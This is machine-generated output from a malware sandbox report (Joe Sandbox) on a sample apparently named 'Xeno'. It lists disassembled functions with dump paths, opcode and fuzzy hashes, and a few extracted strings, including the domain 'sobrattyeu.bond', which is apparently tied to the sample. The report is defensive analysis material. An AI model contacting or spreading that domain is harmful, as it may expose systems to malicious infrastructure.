                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID: 8230
                            • API String ID: 2994545307-3783682864
                            • Opcode ID: d8483902784e992d537755dd4b59732ae0f36d51919b2235ababe292223e5f2d
                            • Instruction ID: 41a12a369cbaee4b10645b1184549661eaa42bebd33bd1e468a9e18b3bf6d82b
                            • Opcode Fuzzy Hash: d8483902784e992d537755dd4b59732ae0f36d51919b2235ababe292223e5f2d
                            • Instruction Fuzzy Hash: 48219838A14510EFD3248F18CC40BBB7256E7DA724F2C872DD4A9172E6DB351C82838E
                            Function 0040BD36 Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: ?<
                            • API String ID: 0-912802884
                            • Opcode ID: 25535c7affac2d1ecf3fd4a1c1079dd18d54a6ea31284e2c4c078e706ffefbe6
                            • Instruction ID: 72500fb80886c93aeb45446100695d8df0453a01af19de91a6ee71012857e070
                            • Opcode Fuzzy Hash: 25535c7affac2d1ecf3fd4a1c1079dd18d54a6ea31284e2c4c078e706ffefbe6
                            • Instruction Fuzzy Hash: 2E21C6757483405BD3149F14DC917BFBBE2EBC6710F259A2DE9D257390CA3C98069B0A
                            Function 0040C12D Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: sobrattyeu.bond
                            • API String ID: 0-1398321731
                            • Opcode ID: 45182aadf4d43d616d438691d66d717b924e10250a2454419b70452a06fe7fec
                            • Instruction ID: 78db256e88ca22536546643472c1f2bb2ef1d62ca8b443b2cdfb421d5753d9a6
                            • Opcode Fuzzy Hash: 45182aadf4d43d616d438691d66d717b924e10250a2454419b70452a06fe7fec
                            • Instruction Fuzzy Hash: 6911E1356487428BC704DF78DCC036BBBE1EB86224F294A3DE5829B691D274E806CB56
                            Function 0042F370 Relevance: .9, Instructions: 887COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 872da5f4682f98ba768673886593a07d8bcda457ff939a6e83b429fc997db95c
                            • Instruction ID: 4dc6f0b05bdc166c5e68359699ab43e9016e425f825e7dcee393f7bc6bb333a0
                            • Opcode Fuzzy Hash: 872da5f4682f98ba768673886593a07d8bcda457ff939a6e83b429fc997db95c
                            • Instruction Fuzzy Hash: 029249B0619B818FD365CF39C891B97BFE9AB4A300F14496EE1EAC7382C7746501CB59
                            Function 0043FE40 Relevance: .9, Instructions: 870COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 62ee89081862f39c45727cad95027fa121b8760447092319d5c623e819af0499
                            • Instruction ID: 3e46d98b0d7b7391bfd4b2d703315793e04d9a17b4fe419fcdec6805aa5427a8
                            • Opcode Fuzzy Hash: 62ee89081862f39c45727cad95027fa121b8760447092319d5c623e819af0499
                            • Instruction Fuzzy Hash: 1542E236B14211CFCB08CF68D8916AEB7E2FB8E314F1A85BED946D7391D6349C418B84
                            Function 0043FF50 Relevance: .8, Instructions: 768COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 20fcca7321e9ad9a37a16830f0415b48849754dd7c00653520191071a511fe31
                            • Instruction ID: 9b597215c7a5d201b9e6edf1352a7e504651228658307191fe5d299f01b535d2
                            • Opcode Fuzzy Hash: 20fcca7321e9ad9a37a16830f0415b48849754dd7c00653520191071a511fe31
                            • Instruction Fuzzy Hash: 0332F236B14211CFDB08CF68D8A16AEB7A1FB8E314F1A85BED946D7391D6349C418B84
                            Function 0043FF70 Relevance: .7, Instructions: 749COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fd9351c2af6c86852d56228da41fed92cd066750c712350a5e113c975854dde7
                            • Instruction ID: 13ac6f09e44a3c4f27938eeb9ee488cdc88ec0ff74ab387f7bc0269203d2706a
                            • Opcode Fuzzy Hash: fd9351c2af6c86852d56228da41fed92cd066750c712350a5e113c975854dde7
                            • Instruction Fuzzy Hash: 39220336B14211CFDB18CF68D8A16AEB7E1FB8E314F1A85BEC946D7391D6349C418B84
                            Function 00402E50 Relevance: .7, Instructions: 670COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 657fbeb9bd83206196e65c2185f4f147248436a8db29e349b32bb40df6c8255e
                            • Instruction ID: 5b235b67c027ffdd562c063778a716c7615e7ef284c4e4779a3d3c4893e29fea
                            • Opcode Fuzzy Hash: 657fbeb9bd83206196e65c2185f4f147248436a8db29e349b32bb40df6c8255e
                            • Instruction Fuzzy Hash: 9752E1315083458BCB15CF18C0906AABBE1FF89304F198A7EF8996B381D778DA49CB85
                            Function 00406510 Relevance: .7, Instructions: 665COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fa0cf401dbd6132c7a04237e87eb557ddabe4e29919801e8bede5bc394010e27
                            • Instruction ID: 2a0666d03bf0ed086b0d38114e7a8d7b89f40c5865758370b92b9aabda8d6973
                            • Opcode Fuzzy Hash: fa0cf401dbd6132c7a04237e87eb557ddabe4e29919801e8bede5bc394010e27
                            • Instruction Fuzzy Hash: 2052B3B0A08B848FE735CB24C4843A7BBE1AF91314F15483ED5E717BC6C27DA9958B19
                            Function 004072F0 Relevance: .6, Instructions: 625COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6e797157fb35717b6a91bbe19d3c6782b16ec68ef1e5ad1ec3f47f605a4e618f
                            • Instruction ID: 1e9becc2452d2d24063ff124eed0e70c5965ea21b12756984417d1b1b7eecbf0
                            • Opcode Fuzzy Hash: 6e797157fb35717b6a91bbe19d3c6782b16ec68ef1e5ad1ec3f47f605a4e618f
                            • Instruction Fuzzy Hash: 8E229272A087118BD725DF18D8806ABB3E1BFC4315F19893ED986A7385D738B851CB87
                            Function 00403860 Relevance: .6, Instructions: 600COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c40101fab6f704138d4421486847cddf638f588d23acbf7306a1daae2842fb01
                            • Instruction ID: 9d797c5af1a22ab3aef09000603e156738bbf4b120111d73ff578770c6aa86dd
                            • Opcode Fuzzy Hash: c40101fab6f704138d4421486847cddf638f588d23acbf7306a1daae2842fb01
                            • Instruction Fuzzy Hash: C7323370914B118FC338CF29C68052ABBF5BF85711B604A2ED697A7B90D73AF945CB18
                            Function 00440190 Relevance: .6, Instructions: 565COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e81018361005d51b1839a835b18b01ba49e097ee0b8e4d053208fb7147f86ae2
                            • Instruction ID: 10e906e831395739cd1bbfe6f31be7f353901b1ccf8a7f1c0f62f8f2d08f69a6
                            • Opcode Fuzzy Hash: e81018361005d51b1839a835b18b01ba49e097ee0b8e4d053208fb7147f86ae2
                            • Instruction Fuzzy Hash: 6A02E03AA14211CFDB08CF68D8906AAB7E1FB8E310F1A857ED946D7391D635AC51CB84
                            Function 00440270 Relevance: .5, Instructions: 508COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e1c79cea8c21c1551f9c304eebe12a7f7e776e847900fd2c5156c30755aa89e5
                            • Instruction ID: 0c2d90faf75ce120585b1b83b2bbddd3d001fe72fa9a953c5be3bde865bfb931
                            • Opcode Fuzzy Hash: e1c79cea8c21c1551f9c304eebe12a7f7e776e847900fd2c5156c30755aa89e5
                            • Instruction Fuzzy Hash: DBF1FF36A14211CFCB18CF68D8906AEB7E1FB8E310F1A857ED946D7391D6359C51CB84
                            Function 00405820 Relevance: .4, Instructions: 400COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0f22763de4bcdc26485400349c62461b958b278f38fe56ac1e4a402e23215dde
                            • Instruction ID: afaab944370aa91e7974f786260b444f5c6cfa69a2d93ff5ed5d754e8c08c566
                            • Opcode Fuzzy Hash: 0f22763de4bcdc26485400349c62461b958b278f38fe56ac1e4a402e23215dde
                            • Instruction Fuzzy Hash: 90E17A7120C7419FD720DF29C880A2BBBE1EF99304F44882EE5D597791E379E944CB9A
                            Function 0041BC60 Relevance: .4, Instructions: 385COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4bba5e74d41eae1e4958b26b1ebb3033613be514ef7f957b1aaf651473e05aac
                            • Instruction ID: 64cab8d7c45886be436990a6a78fe6300b02e1bd66a528804651186d91799465
                            • Opcode Fuzzy Hash: 4bba5e74d41eae1e4958b26b1ebb3033613be514ef7f957b1aaf651473e05aac
                            • Instruction Fuzzy Hash: 2BC11575908300AFD7108F24CC41B5BBBE2EFD8315F148A2EF4D8972A1D77A9D558B86
                            Function 0040AE25 Relevance: .4, Instructions: 384COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6a875727e4fd240dff73eb78aaaeec281654b0a39b6f59cfb8331ab8cb321c76
                            • Instruction ID: 7df6fb6829b482a7b11a8e8092fb8d715825f7ed6b82a3d6d64e529f2e362b1b
                            • Opcode Fuzzy Hash: 6a875727e4fd240dff73eb78aaaeec281654b0a39b6f59cfb8331ab8cb321c76
                            • Instruction Fuzzy Hash: 4DC16AB9204B00DFD7248F25EC91B27B7F5FB8A311F15893DE99683A90D738A815CB58
                            Function 00406080 Relevance: .3, Instructions: 303COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a47cf4779e96c498a3bacb3a1360b7721c88dbd32f3e99254b456f432f8d3c8a
                            • Instruction ID: 94bd1b3f37b884ee677b01720a6780fb8747e51e689f8dd532ec262a34bd8082
                            • Opcode Fuzzy Hash: a47cf4779e96c498a3bacb3a1360b7721c88dbd32f3e99254b456f432f8d3c8a
                            • Instruction Fuzzy Hash: 3EC16BB29087418FC360CF68DC86BABB7E1BF85318F09492DD1DAD6342D778A155CB4A
                            Function 0042806B Relevance: .3, Instructions: 296COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e1cb46e16346a915ec0461da78c75c811686a4e1458ec74ae9b6d7cd95a514cd
                            • Instruction ID: c3d58489cbdbe8c142961ffcdfd25de56b96cb5ef0e625aebb4281d22dc1a80b
                            • Opcode Fuzzy Hash: e1cb46e16346a915ec0461da78c75c811686a4e1458ec74ae9b6d7cd95a514cd
                            • Instruction Fuzzy Hash: A4A1CFB4A083118FD714DF68D85072EB7E1EB86304F49457DE985A7392EB79AC04CB8A
                            Function 0041B950 Relevance: .3, Instructions: 294COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5f0265a36c924ea412a42a01b3497823e1013ebb20de01a9d488d6b5b619131c
                            • Instruction ID: 0a99e35862e929ba1edce5c86475662fc36c3fcb7b46ae039f3e7de6a3628fb5
                            • Opcode Fuzzy Hash: 5f0265a36c924ea412a42a01b3497823e1013ebb20de01a9d488d6b5b619131c
                            • Instruction Fuzzy Hash: 08914C726082614BC7158E28C8912ABBBD1DB85324F19C67EECF99B7C2C7389C46D7D1
                            Function 00438E3A Relevance: .3, Instructions: 280COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0a3a60b4231a956822cb534ed781e35010fa98406663c9425735573f7fbd74d5
                            • Instruction ID: ab1fa2557c44bb7c530e5b230bbabe4550a355c3e80b79fe1179f622f7d467b3
                            • Opcode Fuzzy Hash: 0a3a60b4231a956822cb534ed781e35010fa98406663c9425735573f7fbd74d5
                            • Instruction Fuzzy Hash: 0ED19321D087DA8ACB22C6BC88482CDBFB15F67234F184399E4F56B3D6D7644942C7A6
                            Function 00430D63 Relevance: .3, Instructions: 251COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 263c2ef4b102f6d64fed50ffc9ce4ea3334cf3049dec0d06d218e2b4ef7ff365
                            • Instruction ID: 9cc43240adb88bd219f3f1ea5a1ff5186a9c604b40530c22f65039ebf468ccf8
                            • Opcode Fuzzy Hash: 263c2ef4b102f6d64fed50ffc9ce4ea3334cf3049dec0d06d218e2b4ef7ff365
                            • Instruction Fuzzy Hash: E6A1E562608BC08FC3259B38C855397BFE25F96324F188A6DD4EB87792D638A409C756
                            Function 0041A591 Relevance: .2, Instructions: 249COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 46c07590fb4c23fdb7348343b9049922dc08f8f4880035e72b8414dba3b5ed43
                            • Instruction ID: 964ba1c99511291c6549503b32feb68e5d77739b3bf5c364c571a87e99271816
                            • Opcode Fuzzy Hash: 46c07590fb4c23fdb7348343b9049922dc08f8f4880035e72b8414dba3b5ed43
                            • Instruction Fuzzy Hash: 6A5134706093518BD7188F24C4617BBB7F2EF96314F18881DE8C65B391E778C945C79A
                            Function 00430477 Relevance: .2, Instructions: 235COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4a9c2d8b0f2fa5d3848dccf5739e93bb44efbdb49ec70a9784c4828a2d371fbe
                            • Instruction ID: 1b7dc95f2bb3ef49513049ecaa80f5de5d8a479ca20573e1a1938d6b818bba41
                            • Opcode Fuzzy Hash: 4a9c2d8b0f2fa5d3848dccf5739e93bb44efbdb49ec70a9784c4828a2d371fbe
                            • Instruction Fuzzy Hash: 4FA10471509FC08FD3258B38C8953A7BFE19F96324F188A6DC5EA877C2D639A409C716
                            Function 00440F00 Relevance: .2, Instructions: 231COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 470f47c29065d71bd3e8ed05e0d0ccc229ebecd17263815bd2c9eb64167ea049
                            • Instruction ID: 0b4367273e2ac0780b541d2be758f7a083ad16d243ce2d220f8705cf06ae3663
                            • Opcode Fuzzy Hash: 470f47c29065d71bd3e8ed05e0d0ccc229ebecd17263815bd2c9eb64167ea049
                            • Instruction Fuzzy Hash: E181A2342042058BE724DF18D890A6BB3F1EF99714F14866DEA948B3B1DB35DC91CB4A
                            Function 00434BD0 Relevance: .2, Instructions: 224COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 54f87d89e86721d45ea670cd844e47110252a31b5d73305b73774d2b51844bcb
                            • Instruction ID: 19c571fd693ec990de500c8aebb91ab7d8b7bd3eac4b65ed18e20e34b4adca4c
                            • Opcode Fuzzy Hash: 54f87d89e86721d45ea670cd844e47110252a31b5d73305b73774d2b51844bcb
                            • Instruction Fuzzy Hash: 95713A33719A904BD3288A3C4C512AABE830BDB334F3ED76EE5F18B3E1D56948024355
                            Function 00419570 Relevance: .2, Instructions: 216COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6ebb854b93884d47597612efc05219a350964ab2ba15a9ba7697f3b7cf95e6cc
                            • Instruction ID: bf895229596975545681845f05c82837bae0d2da37012269a61926e52c2c9c87
                            • Opcode Fuzzy Hash: 6ebb854b93884d47597612efc05219a350964ab2ba15a9ba7697f3b7cf95e6cc
                            • Instruction Fuzzy Hash: 78613736B596818BC7188E3C5CA52EAAA834BD7330F2CC37ED9B58B3E5C55C4C468356
                            Function 00426E26 Relevance: .2, Instructions: 203COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2573f4719076280f9081c71ab03c6e5eb130c8d9f1a247b555b6dfa6d5fa1b5e
                            • Instruction ID: c5ddfaa82ed4cdddec0ebd0cb8a484fdac38e99f75c9d8d516e90df6edbc77c4
                            • Opcode Fuzzy Hash: 2573f4719076280f9081c71ab03c6e5eb130c8d9f1a247b555b6dfa6d5fa1b5e
                            • Instruction Fuzzy Hash: 66515C76B082A047C7189E64EC9217FB3D2EB96314F4B483EE982C7780E67C9805C75A
                            Function 0043B150 Relevance: .2, Instructions: 200COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6e848ac17aeaa9a63ac664f1b0d029720cd8936e29b9b70f95f5fd55a41942cb
                            • Instruction ID: dd765c1007c0063bbc284ed99e3836f84c20071e48af44568b62126e4260c04f
                            • Opcode Fuzzy Hash: 6e848ac17aeaa9a63ac664f1b0d029720cd8936e29b9b70f95f5fd55a41942cb
                            • Instruction Fuzzy Hash: FD61EC72E045504FD708CE7DCC513AF7AA2EB8A330F19836EEA769B3D5CA3848058795
                            Function 00439510 Relevance: .2, Instructions: 189COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bda84cd0dd2d832cbe0bb09323e108403c23b8d3d2b3f1482efbea44335fe5e4
                            • Instruction ID: bbd24c8d1ec5d39f568975cef260b7b959216e01e04ada5d6ff254d8a7342010
                            • Opcode Fuzzy Hash: bda84cd0dd2d832cbe0bb09323e108403c23b8d3d2b3f1482efbea44335fe5e4
                            • Instruction Fuzzy Hash: 7B515CB15087548FE714DF29D49435BBBE1BBC8318F044A2EE5E987390E779DA088B86
                            Function 004406D0 Relevance: .2, Instructions: 161COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 46f8f337f22e02d04a0e2d37d0cc0ce0aa297bed9e0a1afc6f23890ecae723a5
                            • Instruction ID: f86eb67565c442f126d44a9fc2ea82268c758345b0b106f305f92bbc5d7c4fb8
                            • Opcode Fuzzy Hash: 46f8f337f22e02d04a0e2d37d0cc0ce0aa297bed9e0a1afc6f23890ecae723a5
                            • Instruction Fuzzy Hash: DF511336A18311CFC708CF28D99056BB7E1FB8A700F0A887DEDC693291D635E8519B95
                            Function 0041794B Relevance: .2, Instructions: 153COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 609ec896ddb562d4e22ed4c0cc1487c53ef4e61f49ce1a93a67459b748502ac8
                            • Instruction ID: d36d9cbe7017fb3b724121fb30ccb97f7bb09f714ff0b0c1a329a590b79bd43c
                            • Opcode Fuzzy Hash: 609ec896ddb562d4e22ed4c0cc1487c53ef4e61f49ce1a93a67459b748502ac8
